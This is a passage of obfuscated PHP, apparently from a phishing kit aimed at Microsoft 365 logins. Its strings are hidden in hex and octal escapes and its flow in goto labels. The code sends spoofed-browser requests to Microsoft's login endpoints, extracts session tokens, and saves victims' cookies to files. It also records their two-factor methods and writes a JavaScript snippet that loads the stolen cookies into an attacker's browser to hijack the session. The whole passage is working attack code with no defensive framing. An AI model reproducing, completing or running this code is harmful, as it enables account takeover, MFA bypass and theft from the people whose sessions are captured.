                        "\143\162\x6f\x73\x73\x2d\163\151\164\x65",
                    "\x55\160\x67\162\x61\x64\145\55\111\156\x73\145\143\x75\162\145\x2d\x52\x65\x71\x75\x65\163\164\163" =>
                        "\61",
                    "\125\x73\145\162\x2d\x41\147\x65\x6e\x74" =>
                        "\x4d\157\x7a\x69\x6c\154\141\x2f\65\56\x30\40\x28\x57\x69\156\x64\157\x77\x73\x20\116\x54\40\61\60\56\60\73\x20\127\x69\156\66\x34\x3b\x20\170\x36\x34\51\40\101\160\x70\x6c\145\127\x65\142\113\151\x74\x2f\65\x33\x37\56\x33\x36\x20\x28\113\x48\x54\115\x4c\54\40\x6c\x69\153\x65\40\107\145\x63\153\x6f\51\x20\x43\x68\x72\157\155\145\57\61\62\x38\x2e\x30\56\x30\x2e\60\x20\123\x61\146\141\x72\151\57\x35\x33\x37\56\x33\x36\40\x45\144\147\x2f\61\x32\x38\x2e\x30\56\60\56\x30\40\117\x53\x2f\x31\x30\56\x30\x2e\62\62\66\63\65",
                    "\130\x2d\x45\144\x67\145\x2d\123\150\157\160\160\x69\x6e\147\x2d\x46\x6c\x61\147" =>
                        "\x30",
                ],
                "\x66\157\162\155\137\160\x61\162\141\155\163" => [
                    "\162\145\161\165\x65\x73\x74" => $a967e,
                    "\x66\x6c\157\167\x54\157\x6b\145\156" => $D6e97,
                ],
            ]
        );
        goto c53d4;
        F8a7f:
        if (
            strpos(
                $A75e0,
                "\x75\x72\x6c\x42\145\x67\x69\x6e\101\x75\x74\150"
            ) !== false
        ) {
            goto b093c;
        }
        goto c2a45;
        b7ca8:
        $Bcc9d = new Client(["\x63\157\157\x6b\151\x65\163" => $F16be]);
        goto F75e3;
        a9cff:
        $F16be = new FileCookieJar(
            $this->A20d7 .
                "\x2f\143\157\157\153\151\145\137" .
                $this->Fa736 .
                "\56\x74\x78\x74",
            true
        );
        goto D5ddc;
        af3b4:
        aab0d:
        goto b1e89;
        e0879:
        $F16be = new FileCookieJar(
            $this->A20d7 .
                "\x2f\143\x6f\157\153\x69\x65\x5f" .
                $this->Fa736 .
                "\56\x74\x78\x74",
            true
        );
        goto e1599;
        e4c3d:
        $this->cc473 = $Bc3b4[0];
        goto bbb54;
        bea95:
        $Ddc7a = $Ddc7a[0];
        goto D04bf;
        db1ed:
        D4ab2:
        goto b1004;
        d03df:
        c19bb:
        goto F4ef6;
        D05a3:
        preg_match($c4ca3, $A75e0, $ae633);
        goto b3d63;
        E5583:
        $A75e0 = $Accd6->getBody()->getContents();
        goto Fbc04;
        d5197:
        $A75e0 = $Accd6->getBody()->getContents();
        goto a3869;
        a52d6:
        c5c97:
        goto Ab8e9;
        Acc51:
        preg_match(
            "\x2f\156\x61\x6d\145\75\x22\146\154\157\x77\x54\157\x6b\145\x6e\42\x20\166\141\x6c\165\x65\x3d\42\50\x5b\136\42\135\x2b\51\42\57",
            $A75e0,
            $B2f3b
        );
        goto c6a91;
        bd064:
        $E3848 =
            "\x28\146\x75\x6e\143\164\x69\157\x6e\50\x29\40\173\xd\xa\11\11\11\11\11\x9\154\145\x74\x20\143\157\x6f\153\151\x65\x73\40\75\40\x4a\123\117\x4e\x2e\x70\x61\x72\163\x65\x28\x60" .
            $D5295 .
            "\140\x29\x3b\xd\12\11\x9\11\11\x9\xd\xa\11\x9\x9\x9\x9\11\146\165\x6e\x63\164\151\x6f\x6e\x20\160\165\164\x43\157\157\x6b\x69\x65\x28\x6b\x65\171\x2c\x20\x76\x61\154\165\145\54\x20\x64\x6f\x6d\141\x69\156\x2c\x20\x70\141\164\150\x2c\x20\151\163\x53\x65\x63\165\x72\145\51\40\173\15\xa\11\x9\x9\x9\x9\11\11\143\157\156\x73\164\40\143\157\157\153\x69\145\x4d\141\170\x41\147\145\40\75\x20\x22\115\x61\170\55\101\x67\x65\x3d\x33\x31\65\x33\66\60\60\x30\x22\x3b\xd\12\x9\x9\11\11\11\11\x9\151\x66\x20\50\x6b\145\x79\x2e\x73\x74\x61\162\x74\163\x57\x69\164\x68\x28\x22\137\x5f\110\x6f\x73\x74\42\51\x29\x20\x7b\15\12\x9\x9\x9\x9\x9\11\x9\x9\143\x6f\156\x73\157\x6c\145\x2e\x6c\x6f\x67\x28\x22\x3d\75\75\x3d\x20\x4b\x72\141\164\157\163\x20\75\x3d\75\75\76\x22\x2c\40\x6b\x65\171\x2c\x20\166\x61\154\165\x65\x29\x3b\15\12\x9\x9\x9\11\11\x9\11\11\x64\157\x63\x75\x6d\145\156\x74\56\143\x6f\157\x6b\x69\x65\40\x3d\40\x60\44\173\x6b\145\171\175\75\44\173\x76\x61\x6c\165\145\175\73\44\x7b\x63\157\x6f\153\x69\x65\115\x61\x78\101\x67\145\x7d\73\160\141\164\150\x3d\x2f\x3b\x53\x65\x63\165\x72\145\73\123\141\x6d\x65\123\151\x74\x65\75\x4e\157\x6e\x65\x60\x3b\15\xa\11\x9\x9\x9\x9\x9\11\175\40\145\154\x73\x65\40\x69\x66\x20\50\153\x65\171\56\x73\x74\141\162\164\163\127\151\164\x68\50\42\x5f\x5f\x53\x65\x63\x75\x72\145\42\x29\51\x20\x7b\xd\12\x9\x9\x9\x9\11\11\x9\x9\143\157\x6e\163\157\x6c\145\x2e\x6c\157\x67\x28\x22\x3d\75\x3d\x3d\40\x4b\x72\x61\164\157\x73\x20\75\x3d\75\x3d\x3e\x22\x2c\40\153\x65\171\54\x20\x76\x61\x6c\x75\145\51\x3b\15\12\x9\x9\x9\x9\11\x9\x9\11\x64\157\x63\x75\155\x65\x6e\x74\x2e\143\157\157\153\x69\145\40\x3d\40\140\x24\173\x6b\x65\x79\x7d\75\x24\173\166\x61\154\165\x65\x7d\73\x24\x7b\143\157\157\x6b\151\x65\x4d\141\170\x41\147\145\175\x3b\x64\157\155\141\151\156\75\x24\173\x64\157\155\x61\x69\x6e\x7d\x3b\160\141\164\x68\75\44\173\x70\x61\x74\150\x7d\73\x53\x65\x63\x75\x72\x65\73\x53\x61\155\145\x53\151\x74\145\75\116\157\x6e\x65\140\x3b\15\xa\x9\x9\x9\x9\11\x9\11\x7d\40\x65\154\163\x65\40\173\xd\xa\11\11\11\11\x9\x9\11\x9\151\146\x20\x28\x69\163\123\x65\x63\x75\162\x65\51\x20\173\xd\xa\11\11\11\11\x9\11\11\x9\11\x63\x6f\x6e\x73\x6f\x6c\145\56\154\157\x67\x28\x22\75\x3d\75\75\x20\x4b\x72\141\164\x6f\163\x20\75\75\75\x3d\76\x22\x2c\x20\153\145\x79\54\40\x76\x61\x6c\x75\145\x29\x3b\15\xa\11\11\x9\x9\11\x9\11\11\x9\x69\146\x20\x28\x77\x69\156\x64\x6f\x77\x2e\x6c\157\x63\x61\x74\x69\157\156\x2e\150\157\x73\x74\156\141\x6d\145\x20\75\75\40\x64\157\155\141\x69\x6e\51\40\173\xd\xa\x9\x9\x9\x9\11\11\x9\x9\x9\x9\144\157\143\165\155\x65\156\164\56\x63\157\x6f\153\x69\x65\x20\75\x20\140\x24\173\153\145\x79\x7d\x3d\x24\173\x76\x61\154\165\145\175\x3b\x24\x7b\143\157\x6f\x6b\x69\x65\x4d\x61\170\101\x67\x65\175\x3b\x20\x70\141\x74\x68\75\x24\x7b\160\x61\164\150\175\73\40\x53\145\x63\x75\162\x65\73\x20\123\141\x6d\x65\x53\151\x74\x65\x3d\116\x6f\x6e\145\140\x3b\xd\12\x9\x9\11\x9\x9\x9\11\x9\x9\175\x20\145\x6c\x73\x65\40\173\15\xa\x9\x9\11\x9\11\x9\11\11\x9\11\144\157\x63\165\x6d\x65\156\x74\x2e\143\x6f\x6f\x6b\151\x65\40\75\x20\140\44\x7b\x6b\x65\x79\x7d\x3d\44\x7b\166\x61\154\x75\x65\175\73\44\x7b\143\157\157\153\x69\145\115\x61\170\x41\147\x65\175\x3b\144\x6f\155\141\151\156\x3d\x24\173\x64\x6f\155\x61\x69\156\175\73\160\x61\164\150\75\44\x7b\160\141\x74\150\175\73\x53\x65\x63\x75\x72\145\73\x53\x61\x6d\x65\x53\x69\164\145\75\x4e\157\156\145\x60\x3b\xd\xa\11\x9\x9\11\11\x9\11\11\11\175\15\12\x9\x9\x9\x9\11\11\11\11\x7d\x20\145\x6c\163\145\x20\173\15\12\x9\x9\x9\x9\11\x9\x9\11\x9\143\157\x6e\x73\157\154\x65\x2e\154\157\x67\50\42\75\x3d\x3d\75\40\x4b\x72\x61\164\x6f\x73\x20\75\75\x3d\75\76\42\x2c\x20\153\x65\171\54\40\x76\141\x6c\165\x65\x29\73\xd\xa\11\11\x9\11\x9\x9\x9\11\11\x69\x66\40\x28\167\151\156\x64\x6f\167\x2e\x6c\157\143\x61\164\x69\x6f\156\56\150\157\163\164\156\141\x6d\x65\40\75\x3d\40\x64\x6f\x6d\141\151\x6e\x29\40\173\xd\12\11\11\x9\11\11\x9\x9\11\x9\x9\x64\157\x63\165\x6d\145\156\x74\56\143\x6f\x6f\x6b\x69\x65\x20\75\x20\x60\x24\173\153\145\x79\x7d\75\44\173\166\141\154\x75\x65\x7d\73\44\x7b\x63\x6f\x6f\x6b\151\145\x4d\141\x78\101\147\x65\175\73\160\x61\x74\150\x3d\x24\x7b\160\x61\164\x68\x7d\73\x60\73\xd\12\11\11\11\11\x9\11\11\11\11\x7d\40\145\154\163\145\40\173\xd\12\x9\11\x9\x9\11\11\x9\11\11\11\x64\157\x63\x75\155\x65\x6e\164\x2e\143\157\157\x6b\151\145\x20\x3d\x20\x60\44\173\153\145\171\x7d\75\x24\173\166\141\x6c\165\145\x7d\x3b\x24\173\x63\x6f\x6f\153\151\x65\115\141\x78\101\x67\145\175\x3b\144\x6f\155\141\151\156\x3d\x24\x7b\x64\157\155\x61\151\x6e\x7d\x3b\160\x61\x74\150\x3d\x24\173\x70\x61\164\150\175\x3b\x60\73\xd\xa\11\11\x9\11\x9\x9\11\x9\11\x7d\15\12\x9\11\x9\11\11\11\11\11\x7d\xd\xa\x9\x9\11\11\11\11\x9\175\15\xa\x9\x9\x9\11\x9\11\175\xd\xa\11\11\11\x9\x9\x9\x66\x6f\x72\x20\x28\x6c\145\x74\x20\143\x6f\157\153\151\x65\40\157\x66\40\x63\157\157\153\x69\x65\x73\51\x20\x7b\xd\12\11\11\11\x9\11\11\11\x70\x75\164\x43\157\x6f\153\x69\145\50\143\x6f\157\x6b\x69\x65\x2e\x4e\141\155\x65\x2c\40\143\157\157\x6b\x69\x65\x2e\x56\x61\x6c\x75\x65\x2c\40\x63\157\157\x6b\x69\145\56\104\157\x6d\x61\151\x6e\54\40\143\x6f\157\x6b\151\145\56\x50\x61\164\x68\x2c\x20\143\x6f\157\153\151\x65\56\x53\x65\x63\x75\162\x65\x29\x3b\15\12\11\11\11\11\x9\11\175\xd\xa\11\11\x9\11\11\x7d\x28\51\x29\73";
        goto c15c6;
        a693e:
        $this->status["\x6c\x69\x76\x65"] = false;
        goto D4dee;
        d53e8:
        $this->fac50 = $ea051[0];
        goto e4c3d;
        b197a:
        preg_match(
            "\x2f\50\77\x3c\x3d\42\143\157\162\x72\145\154\x61\164\151\157\x6e\x49\144\42\72\42\x29\x5b\136\42\135\52\x2f",
            $A75e0,
            $eb813
        );
        goto d53e8;
        D4dee:
        return 1;
        goto F5d32;
        bbb54:
        $this->B5b07 = $ef175[0];
        goto b1ef9;
        B782c:
        preg_match(
            "\57\x28\77\74\x3d\42\143\141\x6e\141\x72\171\x22\x3a\42\51\x5b\136\x22\135\52\x2f",
            $A75e0,
            $ef175
        );
        goto d8ffa;
        e3717:
        B5586:
        goto a5e1d;
        b8346:
        return 1;
        goto c6100;
        Ae416:
        $Accd6 = $Bcc9d->request(
            "\x47\x45\124",
            "\x68\x74\x74\160\163\72\x2f\x2f\154\157\x67\151\x6e\x2e\x6d\151\x63\162\x6f\x73\x6f\146\x74\x6f\156\154\x69\x6e\145\x2e\143\157\155\72\x34\x34\x33\57\143\x6f\x6d\x6d\x6f\156\x2f\x44\145\x76\151\x63\145\101\x75\164\150\124\x6c\x73\57\162\x65\160\162\x6f\143\145\163\163",
            [
                "\x68\x65\x61\x64\145\162\x73" => [
                    "\x41\x63\x63\145\160\x74" =>
                        "\164\x65\x78\x74\x2f\150\164\155\x6c\54\x61\160\x70\x6c\151\x63\x61\x74\151\157\156\x2f\170\x68\x74\x6d\154\53\170\155\154\x2c\x61\160\x70\x6c\x69\143\x61\164\151\x6f\x6e\x2f\x78\155\x6c\x3b\x71\x3d\60\x2e\x39\54\151\155\141\147\x65\x2f\141\166\x69\146\x2c\x69\155\141\x67\x65\57\167\145\x62\160\54\151\155\x61\147\x65\57\141\160\x6e\x67\x2c\52\57\52\73\x71\75\x30\56\x38\x2c\141\160\160\x6c\x69\x63\141\164\x69\x6f\156\57\163\x69\147\x6e\x65\144\x2d\x65\x78\x63\150\141\156\x67\145\73\166\x3d\x62\63\73\x71\75\60\56\x37",
                    "\x41\143\x63\x65\160\164\55\114\x61\x6e\147\165\x61\x67\x65" =>
                        "\x65\x6e\x2d\125\x53\54\x65\156\x3b\x71\x3d\60\x2e\x39",
                    "\x43\x6f\x6f\153\151\145" => $this->gencook(
                        $this->A20d7 .
                            "\57\143\157\x6f\x6b\x69\x65\137" .
                            $this->Fa736 .
                            "\56\164\170\164"
                    ),
                    "\120\x72\x69\x6f\162\151\x74\171" =>
                        "\x75\75\x30\x2c\x20\x69",
                    "\123\145\x63\55\103\x68\55\x55\141" =>
                        "\42\103\150\x72\x6f\x6d\151\x75\x6d\42\73\166\75\42\x31\x32\x38\x22\x2c\40\42\x4e\157\x74\73\x41\75\102\x72\x61\156\x64\42\73\166\x3d\42\62\x34\42\54\x20\x22\x4d\151\143\162\157\x73\x6f\146\164\x20\105\x64\147\x65\x22\73\x76\x3d\x22\x31\x32\x38\x22",
                    "\123\x65\143\x2d\x43\150\x2d\125\141\55\115\157\x62\x69\154\145" =>
                        "\77\x30",
                    "\x53\x65\143\x2d\103\x68\x2d\125\141\x2d\x50\154\141\164\x66\x6f\162\x6d" =>
                        "\42\x57\x69\x6e\x64\157\x77\163\x22",
                    "\123\145\x63\x2d\x43\150\x2d\125\x61\x2d\x50\x6c\x61\x74\x66\157\x72\x6d\x2d\x56\145\162\163\151\157\156" =>
                        "\42\61\x35\x2e\x30\x2e\60\42",
                    "\123\x65\143\55\x46\145\164\x63\x68\55\104\145\x73\x74" =>
                        "\144\157\x63\165\x6d\x65\x6e\x74",
                    "\x53\x65\x63\x2d\x46\x65\164\143\x68\55\115\x6f\x64\145" =>
                        "\156\x61\166\151\x67\141\164\x65",
                    "\123\145\143\55\x46\145\x74\x63\x68\55\x53\x69\164\145" =>
                        "\x63\162\157\163\x73\x2d\x73\x69\x74\145",
                    "\x55\160\x67\162\x61\x64\x65\55\111\x6e\x73\145\x63\x75\x72\x65\x2d\122\145\x71\165\145\163\x74\163" =>
                        "\x31",
                    "\125\x73\145\x72\55\101\x67\145\156\x74" =>
                        "\115\157\x7a\x69\154\x6c\141\57\x35\56\60\40\x28\127\151\156\144\x6f\167\x73\40\x4e\124\40\61\60\56\x30\x3b\x20\127\151\156\x36\64\73\40\170\66\x34\51\x20\101\x70\160\154\x65\127\x65\x62\x4b\x69\164\x2f\x35\x33\67\x2e\63\x36\40\x28\113\110\x54\115\x4c\x2c\x20\x6c\x69\x6b\145\40\107\x65\143\153\157\x29\40\x43\150\162\157\x6d\145\x2f\61\62\x38\x2e\x30\x2e\x30\x2e\60\x20\x53\x61\146\x61\162\x69\x2f\65\x33\67\56\63\x36\40\x45\x64\147\x2f\x31\x32\x38\x2e\60\56\x30\56\x30\40\x4f\123\57\x31\x30\56\x30\56\62\x32\x36\x33\x35",
                    "\x58\x2d\105\x64\x67\145\x2d\x53\x68\x6f\x70\x70\151\x6e\147\55\106\x6c\x61\x67" =>
                        "\x30",
                ],
                "\x66\157\x72\155\x5f\160\x61\162\x61\x6d\163" => [
                    "\x63\x74\170" => $a967e,
                    "\146\x6c\157\x77\124\157\153\145\156" => $D6e97,
                ],
            ]
        );
        goto c6529;
        D6656:
        goto fe7e5;
        goto Eee21;
        F4ef6:
        $this->status["\x6c\x69\x76\145"] = false;
        goto b8346;
        Ad66b:
        $D6e97 = $B2f3b[1];
        goto Fd9f7;
        b1ef9:
        $this->B522d = $a6081[0];
        goto E086c;
        D8942:
        $A75e0 = $Accd6->getBody()->getContents();
        goto ab77c;
        b1004:
        $F16be = new FileCookieJar(
            $this->A20d7 .
                "\57\x63\x6f\157\x6b\x69\145\137" .
                $this->Fa736 .
                "\x2e\x74\x78\164",
            true
        );
        goto b7ca8;
        Ab8e9:
        preg_match(
            "\57\x6e\141\x6d\x65\x3d\42\x66\154\x6f\167\124\157\x6b\x65\x6e\42\x20\166\141\154\165\x65\x3d\x22\50\133\136\x22\x5d\53\x29\x22\57",
            $A75e0,
            $B2f3b
        );
        goto eb79c;
        a05b0:
        foreach ($b0338 as $a47dd => $Cfb59) {
            goto E1ab3;
            E1ab3:
            if (
                !(
                    isset(
                        $Cfb59[
                            "\141\x75\x74\x68\x4d\x65\164\150\x6f\x64\x49\144"
                        ]
                    ) &&
                    isset($Cfb59["\144\151\x73\160\x6c\141\171"]) &&
                    isset($Cfb59["\151\x73\104\x65\x66\141\165\154\x74"])
                )
            ) {
                goto b6082;
            }
            goto F3990;
            F3990:
            $this->status["\62\x66\141\137\x69\156\x66\x6f"][$a47dd] = [
                "\x6d\145\164\150\x6f\144\137\156\x61\x6d\145" =>
                    $Cfb59["\141\x75\164\150\115\145\x74\150\157\144\111\144"],
                "\x64\x69\x73\160\154\141\x79" =>
                    $Cfb59["\144\x69\x73\x70\154\141\x79"],
                "\151\x73\104\x65\x66\x61\165\x6c\x74" =>
                    $Cfb59["\151\x73\104\145\146\x61\165\154\164"],
            ];
            goto b2382;
            da90a:
            B5e1d:
            goto Ea790;
            b2382:
            b6082:
            goto da90a;
            Ea790:
        }
        goto af3b4;
        c53d4:
        $F16be->save(
            $this->A20d7 .
                "\x2f\x63\x6f\x6f\x6b\151\145\137" .
                $this->Fa736 .
                "\x2e\x74\170\x74"
        );
        goto d5197;
        Ff589:
        $D6e97 = $B2f3b[1];
        goto db1ed;
        B713e:
        $Bcc9d = new Client(["\x63\157\157\x6b\x69\145\163" => $F16be]);
        goto Ae416;
        f9726:
        preg_match(
            "\x2f\x28\x3f\x3c\x3d\x22\165\x72\154\x52\145\163\x75\155\145\42\72\x22\51\133\136\42\x5d\x2a\57",
            $A75e0,
            $Ddc7a
        );
        goto bea95;
        f72c8:
        preg_match(
            "\57\x28\x3f\74\75\42\163\x65\x73\163\151\x6f\x6e\111\x64\x22\72\42\x29\x5b\x5e\x22\135\x2a\x2f",
            $A75e0,
            $D70fc
        );
        goto b197a;
        Fd9f7:
        E1b70:
        goto C52ba;
        e1599:
        $Bcc9d = new Client(["\143\x6f\157\x6b\x69\x65\x73" => $F16be]);
        goto Ab18b;
        b3d63:
        $f8b73 = isset($ae633[1]) ? $ae633[1] : "\133\135";
        goto f2be5;
        B1f1c:
        $Accd6 = $Bcc9d->request(
            "\x50\x4f\x53\124",
            "\150\164\x74\160\163\x3a\57\57\x6c\x6f\147\151\156\56\x6d\151\143\x72\157\x73\157\146\164\x6f\156\154\151\156\x65\x2e\143\157\155\x2f\153\155\x73\x69",
            [
                "\150\145\x61\x64\x65\162\163" => [
                    "\101\x63\x63\145\x70\164" =>
                        "\164\x65\x78\x74\57\150\x74\x6d\154\x2c\141\x70\160\154\151\143\x61\x74\x69\x6f\x6e\x2f\x78\x68\164\155\154\53\170\x6d\x6c\x2c\141\x70\160\x6c\x69\x63\141\164\151\x6f\156\57\170\x6d\x6c\73\161\75\60\56\x39\54\x69\x6d\141\x67\145\x2f\141\166\x69\x66\x2c\151\x6d\141\147\145\57\x77\x65\142\160\x2c\151\x6d\x61\x67\145\x2f\x61\160\156\x67\54\52\57\x2a\73\161\x3d\x30\x2e\70\x2c\141\160\x70\x6c\x69\x63\x61\164\x69\157\x6e\x2f\163\x69\147\x6e\145\x64\x2d\x65\170\x63\x68\141\156\x67\145\73\x76\75\x62\63\x3b\161\75\60\x2e\67",
                    "\x41\143\x63\145\x70\x74\x2d\114\x61\156\147\x75\141\147\145" =>
                        "\145\x6e\55\x55\123\x2c\x65\156\73\161\x3d\x30\56\71",
                    "\103\x61\x63\x68\x65\x2d\103\157\x6e\164\162\x6f\154" =>
                        "\155\x61\x78\x2d\x61\x67\145\75\x30",
                    "\103\x6f\156\164\145\156\x74\x2d\124\x79\160\145" =>
                        "\141\160\x70\x6c\x69\143\141\x74\x69\x6f\156\x2f\x78\55\x77\x77\x77\55\x66\157\x72\155\55\165\x72\x6c\x65\x6e\143\157\x64\x65\144",
                    "\x43\157\x6f\x6b\151\145" => $this->gencook(
                        $this->A20d7 .
                            "\x2f\143\157\157\153\151\145\x5f" .
                            $this->Fa736 .
                            "\56\x74\x78\x74"
                    ),
                    "\117\162\151\147\x69\156" =>
                        "\x68\164\x74\x70\x73\x3a\57\57\x6c\x6f\147\x69\156\56\x6d\151\x63\x72\157\163\x6f\146\164\x6f\x6e\x6c\x69\156\145\x2e\143\x6f\155",
                    "\122\x65\x66\x65\162\x65\162" =>
                        "\150\164\x74\x70\163\72\57\x2f\x6c\x6f\147\x69\x6e\56\155\x69\x63\162\157\163\x6f\x66\164\157\156\x6c\x69\156\x65\56\x63\157\155\57\143\x6f\155\155\x6f\x6e\57\154\157\147\151\x6e",
                    "\123\x65\143\55\103\x48\55\125\x41" =>
                        "\x22\115\151\x63\162\x6f\x73\157\x66\164\x20\x45\144\x67\145\42\73\166\75\42\x31\x32\71\42\x2c\40\42\x4e\157\164\x3d\101\x3f\102\x72\x61\156\144\42\x3b\166\x3d\x22\70\42\x2c\x20\42\103\x68\x72\157\155\x69\165\x6d\x22\73\166\75\x22\x31\62\x39\42",
                    "\x53\145\143\x2d\x43\x48\x2d\x55\101\x2d\115\157\142\x69\154\x65" =>
                        "\x3f\60",
                    "\123\145\143\x2d\103\x48\55\125\101\55\x50\x6c\x61\x74\x66\157\162\155" =>
                        "\x22\x57\151\156\144\157\167\163\42",
                    "\x53\x65\x63\x2d\x46\145\164\143\x68\55\x44\145\163\164" =>
                        "\144\x6f\x63\x75\x6d\145\156\x74",
                    "\123\x65\143\x2d\x46\145\x74\x63\x68\x2d\115\157\x64\145" =>
                        "\156\141\166\151\x67\141\164\145",
                    "\123\x65\x63\x2d\106\145\x74\143\x68\55\123\151\164\145" =>
                        "\163\141\155\145\55\x6f\162\151\147\x69\156",
                    "\x53\145\143\55\x46\x65\x74\143\x68\x2d\x55\x73\x65\162" =>
                        "\x3f\x31",
                    "\x55\160\147\x72\x61\x64\145\x2d\111\156\x73\145\143\x75\x72\x65\55\122\145\x71\x75\145\163\164\x73" =>
                        "\x31",
                    "\x55\x73\x65\x72\55\x41\x67\x65\156\x74" =>
                        "\115\x6f\x7a\x69\154\x6c\x61\57\65\x2e\60\40\50\127\x69\156\x64\x6f\167\163\x20\x4e\124\x20\61\60\56\60\x3b\x20\x57\x69\156\66\64\73\40\170\x36\x34\x29\x20\101\160\160\x6c\145\127\x65\x62\x4b\x69\164\57\x35\63\x37\x2e\x33\66\x20\x28\x4b\110\x54\115\x4c\54\x20\154\151\153\145\40\x47\x65\x63\153\157\51\x20\103\150\x72\157\155\145\57\61\62\71\x2e\x30\56\x30\x2e\60\40\x53\141\x66\141\162\x69\x2f\x35\x33\x37\x2e\x33\x36\x20\105\x64\x67\57\61\62\x39\56\x30\x2e\60\56\60",
                ],
                "\x66\x6f\x72\x6d\137\160\x61\162\x61\155\163" => [
                    "\114\x6f\x67\151\156\x4f\160\x74\x69\157\156\x73" =>
                        "\x31",
                    "\x74\171\160\145" => "\62\70",
                    "\143\x74\170" => $this->cc473,
                    "\150\160\x67\162\145\x71\x75\x65\163\x74\x69\x64" =>
                        $this->ad1e3,
                    "\x66\154\157\x77\x54\157\x6b\145\156" => $this->fac50,
                    "\x44\157\x6e\164\x53\x68\x6f\167\101\x67\x61\151\156" =>
                        "\x74\162\165\145",
                    "\x63\x61\x6e\x61\162\171" => $this->B5b07,
                    "\151\x31\71" => "\x31\x34\x31\60\70",
                ],
            ]
        );
        goto b71f3;
        dcd33:
        $this->ad1e3 = $eb813[0];
        goto F8a7f;
        c6100:
        f43ad:
        goto C901e;
        a3869:
        preg_match(
            "\57\156\x61\155\145\75\42\x63\x74\170\42\40\166\x61\154\x75\145\75\42\50\133\136\x22\135\x2b\x29\42\57",
            $A75e0,
            $c1345
        );
        goto Db49c;
        fef95:
        $F16be->save(
            $this->A20d7 .
                "\x2f\x63\x6f\x6f\x6b\151\x65\x5f" .
                $this->Fa736 .
                "\x2e\164\170\x74"
        );
        goto E5583;
        a5e1d:
        goto f43ad;
        goto d03df;
        E086c:
        $this->E423c = $D70fc[0];
        goto dcd33;
        Fbc04:
        if (
            strpos(
                $A75e0,
                "\42\x73\x44\145\166\151\143\145\x53\164\141\x74\145\x22\72\42\x55\x6e\162\145\147\151\163\x74\x65\x72\x65\x64\x22"
            ) !== false
        ) {
            goto c19bb;
        }
        goto A8e36;
        e1964:
        preg_match(
            "\x2f\50\x3f\x3c\x3d\x22\163\x43\x74\170\42\x3a\x22\x29\x5b\136\42\x5d\x2a\x2f",
            $A75e0,
            $Bc3b4
        );
        goto B782c;
        c15c6:
        file_put_contents(
            $this->A20d7 .
                "\x2f\152\163\x5f" .
                $this->Fa736 .
                "\x2e\x74\x78\x74",
            $E3848
        );
        goto D63c3;
        Eda73:
        ef3c8:
        goto C22dc;
        B8979:
        $A75e0 = $Accd6->getBody()->getContents();
        goto e3717;
        Db49c:
        if (isset($be20b[1])) {
            goto Ab2c5;
        }
        goto D6656;
        D04bf:
        $Ddc7a = str_replace("\134\x75\60\x30\x32\66", "\46", $Ddc7a);
        goto e0879;
        A4308:
        $F16be = new FileCookieJar(
            $this->A20d7 .
                "\x2f\143\x6f\157\153\151\x65\137" .
                $this->Fa736 .
                "\x2e\x74\170\x74",
            true
        );
        goto Ddf6f;
        Ab18b:
        $Accd6 = $Bcc9d->request("\107\105\x54", $Ddc7a, [
            "\150\145\141\x64\145\x72\x73" => [
                "\101\143\x63\x65\160\164" =>
                    "\x74\x65\170\164\x2f\150\164\x6d\x6c\54\141\x70\160\154\151\143\141\164\x69\157\156\x2f\170\x68\x74\155\x6c\x2b\x78\155\x6c\x2c\141\x70\160\x6c\151\143\x61\x74\151\157\x6e\x2f\x78\155\154\73\x71\x3d\60\56\x39\54\x69\x6d\x61\x67\x65\x2f\141\166\x69\x66\x2c\151\155\x61\147\145\x2f\167\145\x62\x70\x2c\x69\155\x61\x67\x65\x2f\x61\x70\x6e\147\x2c\x2a\57\x2a\x3b\x71\x3d\60\x2e\70\x2c\141\x70\x70\154\x69\x63\141\164\x69\157\x6e\57\x73\x69\x67\156\x65\144\55\x65\170\143\x68\x61\x6e\147\x65\x3b\166\75\x62\63\x3b\161\x3d\60\x2e\x37",
                "\x41\143\143\145\x70\164\x2d\x4c\141\x6e\147\x75\141\x67\x65" =>
                    "\145\156\x2d\x55\x53\54\x65\156\x3b\161\75\x30\56\71",
                "\x43\x6f\x6f\x6b\151\x65" => $this->gencook(
                    $this->A20d7 .
                        "\x2f\143\x6f\x6f\153\x69\145\137" .
                        $this->Fa736 .
                        "\x2e\164\x78\164"
                ),
                "\x50\x72\151\157\162\x69\x74\x79" =>
                    "\165\x3d\x30\x2c\x20\151",
                "\123\x65\143\x2d\103\150\55\x55\141" =>
                    "\x22\103\150\x72\157\x6d\x69\x75\155\42\73\x76\x3d\42\x31\x32\x38\42\x2c\x20\x22\116\x6f\164\x3b\x41\75\102\162\141\x6e\x64\42\73\x76\75\42\62\64\42\x2c\40\x22\x4d\x69\143\162\157\x73\x6f\x66\x74\x20\x45\144\x67\x65\x22\x3b\x76\x3d\42\x31\x32\x38\42",
                "\x53\145\143\x2d\103\x68\x2d\125\141\x2d\x4d\157\142\151\154\x65" =>
                    "\x3f\x30",
                "\123\145\143\55\103\150\55\x55\x61\55\x50\x6c\141\164\x66\157\162\x6d" =>
                    "\42\127\x69\x6e\x64\157\167\163\42",
                "\x53\145\x63\55\103\150\55\x55\141\55\x50\x6c\141\164\146\157\x72\155\x2d\x56\145\x72\x73\151\157\156" =>
                    "\x22\x31\65\56\60\x2e\x30\42",
                "\123\145\143\55\x46\x65\164\143\x68\55\104\x65\163\164" =>
                    "\x64\x6f\x63\165\x6d\x65\x6e\164",
                "\x53\145\x63\55\106\x65\164\143\x68\x2d\x4d\157\x64\145" =>
                    "\x6e\x61\166\x69\147\141\164\145",
                "\x53\x65\143\55\106\145\x74\x63\150\x2d\x53\x69\x74\x65" =>
                    "\x63\x72\x6f\x73\163\x2d\x73\x69\164\145",
                "\x55\x70\x67\162\x61\144\x65\x2d\x49\x6e\x73\x65\143\165\x72\x65\55\x52\x65\161\x75\145\163\164\x73" =>
                    "\61",
                "\x55\163\x65\x72\55\x41\147\x65\156\164" =>
                    "\115\x6f\172\x69\x6c\x6c\141\57\x35\x2e\x30\x20\50\127\x69\156\144\x6f\x77\x73\x20\116\124\40\61\x30\56\x30\73\40\127\151\x6e\66\64\x3b\x20\x78\x36\x34\51\x20\101\160\x70\154\x65\127\x65\142\x4b\151\164\x2f\x35\x33\x37\x2e\x33\x36\40\50\113\x48\x54\x4d\114\x2c\40\x6c\151\153\x65\40\107\145\x63\x6b\157\51\40\103\150\162\x6f\x6d\145\57\x31\62\x38\x2e\60\56\x30\56\x30\40\x53\141\x66\x61\x72\x69\x2f\x35\63\x37\x2e\x33\66\40\105\144\147\x2f\x31\x32\70\56\60\x2e\x30\x2e\x30\40\x4f\x53\57\x31\x30\x2e\60\x2e\x32\x32\66\63\65",
